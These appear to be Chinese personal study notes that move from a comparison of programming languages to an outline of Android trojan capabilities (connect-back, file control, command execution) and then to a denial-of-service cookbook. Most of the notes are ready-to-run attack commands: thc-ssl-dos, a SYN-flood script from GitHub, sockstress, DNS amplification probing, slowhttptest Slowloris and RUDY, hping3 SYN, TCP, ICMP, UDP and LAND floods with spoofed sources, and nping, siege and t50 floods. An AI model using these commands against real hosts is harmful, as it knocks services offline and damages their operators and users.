android系统:基于linux
开发语言可能会选择java
原因:应用广泛,什么地方都有java虚拟机
java ->(语言本身特点)臃肿->java虚拟机(也必然臃肿)->(虚拟机本身是C语言写的)c语言->机器语言->操作系统
苹果公司的过程: oc/swift->机器语言->操纵系统
java功能2:(做网站java web)
jsp+linux+mysql/oracle/db2+tomcat
较好的组合:php+linux+nginx+mysql
java功能3:
jvm pc
java=>jar程序
现状:被kotlin(简单!!!)语言压占市场=>jar程序
java功能4:
java android
java + c(用c编写.so=windows的dll文件)=>android
kotlin(像python,写代码非常快)+c => android
pc程序的制作选择:
c#(c++++难度不高,用户多)
python(超级简单)都很牛逼
Golang(c的精确度,python的快速开发,几乎啥事都能做) go语言
纠结什么语言有前途?
这个语言后台的大佬有没有钱投入?
c/c++ 不可能落寞!!!全球都支持它
java 靠oracle公司支持,老旧设备
kotlin 谷歌+Intellj
oc/swift 苹果公司
php 基金会,全球90%的网站都在使用
python 基金会,小部分人工智能开发/快速开发的公司
go 谷歌,区块链开发公司
c++/c#/vb 微软公司
android木马:
需要具备的环境:
java环境
大多数情况,木马只需要具备:
上线,文件控制,提权(可有可无),命令执行
如果想学android开发:
不要太在意自己学的是不是java,因为android上的编程,相当于一门长得很像java的java语言
工具:
Last_Version (手机远控木马控制)
DOS拒绝服务攻击/DDOS分布式拒绝服务攻击(利用tcp三次握手协议缺陷)
目前这种攻击无解
一般大佬的防御(用钱)
kali的更新源设置为阿里云的:
/etc/apt/source.list
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
apt-get update 更新
apt-get install thc-ssl-dos 安装软件
类似kali的安全审计系统 (功能比kali更强大)
https://www.parrotsec.org/
DDOS操作需要的软件: thc-ssl-dos 可以打击https的网站 默认端口是443
DOS:(肉鸡多了使用同样的命令就是DDOS攻击)
ssl-dos:
服务器每次会处理300次/s的ssl请求
这种攻击方法和传统攻击不一样,使用普通带宽也可以考虑打30G带宽的服务器
apt-get install thc-ssl-dos
目标是打击https的网站
thc-ssl-dos [目标ip] [目标ssl端口:443] --accept
syn flood /syn洪水攻击
apt install python-scapy
apt install python3-scapy
git clone https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git
cd Python-SYN-Flood-Attack-Tool
chmod 777 ./*
python3 py3_synflood_cmd.py -t 10.20.30.40 -p 8080 -c 5 //c表示number of packets 包的数量
python3 py3_SYN-Flood.py
python SYN-Flood.py
sockstress
针对tcp服务,耗尽目标资源,建立大量的sock连接,不消耗网络资源
完成tcp3次握手,最后ack大小为0(客户端不接收数据)
攻击者损耗很小
异步攻击,所以一台设备可以造成很大的效果
windows窗口实现流控
需要python2环境并且安装scapy
sockstress.py [目标ip] [端口号] [线程]
DNS流量放大攻击
发送给dns的数据包94
返回的数据包大小160+
典型的流量放大攻击
单机带宽优势,以小汇多
利用协议的特性放大流量
apt-get install dnsutils //安装dig命令
dig ANY [目标ip(外网)] @[dns服务器地址]
dig ANY qq.com @[dns的ip]
利用回包判断dns服务器是否会被利用
跟很多DNS服务器发信息,让其把数据包等信息回显给要打击的目标A 这样由于返回的数据包是被放大的 也就造成了所谓的流量放大攻击
借助dnsutils来查看不同的DNS服务器其返回的数据包的大小 或者说是放大效果
之后借助收集到的信息在github上下载DNS流量放大攻击工具进行攻击即可
相似类比:NTP放大攻击
慢速攻击(打击网站有效果):
apt-get install openssl
apt-get install libssl-dev
apt-get install slowhttptest
slowhttptest
低带宽应用层慢速DOS攻击(相对于cc慢)
擅长攻击apache tomcat...服务器
耗尽应用并发的连接池,类似于http层的syn_flood
http协议默认在服务端全部接收到请求之后才开始处理,如果客户发送的数据包慢速而且不完整,就会导致Dos
可以发动的攻击类型:Slowloris,slow http post攻击
Slowloris:完整的http协议结尾是\r\n\r\n,它的攻击结尾\r\n
slow http post攻击:http头部content-length声明长度,但是body缓慢发送
slow http post慢速攻击(RUDY):
slowhttptest -c 2000 -B -g -o body_states -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.214 -x 10 -p 3
Slowloris攻击:
slowhttptest -c 2000 -H -g -o my_header_states -i 10 -r 1000 -t GET -u http://192.168.1.214 -x 24 -p 3
hping3
定制发送任何的数据包
-a 伪造源地址
-q 不返回
-n 不解析域名
-s 源端口
-d 字节数
-p 端口
--flood 以flood方式攻击
syn-flood
hping3 -c 3000 -d 120 -S -w 64 -p 80 --flood --rand-source [目标ip]
hping3 -S -P -p 80 --flood --rand-source [目标ip]
tcp-flood
hping3 -SARUFP -p 80 --flood --rand-source [目标ip]
icmp-flood
hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood [目标ip]
udp-flood
hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood [目标ip]
LAND
特殊的syn-flood攻击
源地址和目的地址都是受害者,自己和自己完成3次握手
hping3 -n -a [目标ip] -S -d 100 -p 80 --flood [目标ip]
TCP全链接DOS攻击
nping --tcp-connect --rate=10000 -c 10000000 -q [目标ip]
siege发起攻击
siege -i -c 1000000 [目标ip] -A httttttp
t50压力测试
网络协议支持全面
t50 -h 可以查看参数
t50 [目标网关] --flood --turbo -S --protocol TCP --dport 22
t50 --flood --protocol TCP [目标ip] --dport 80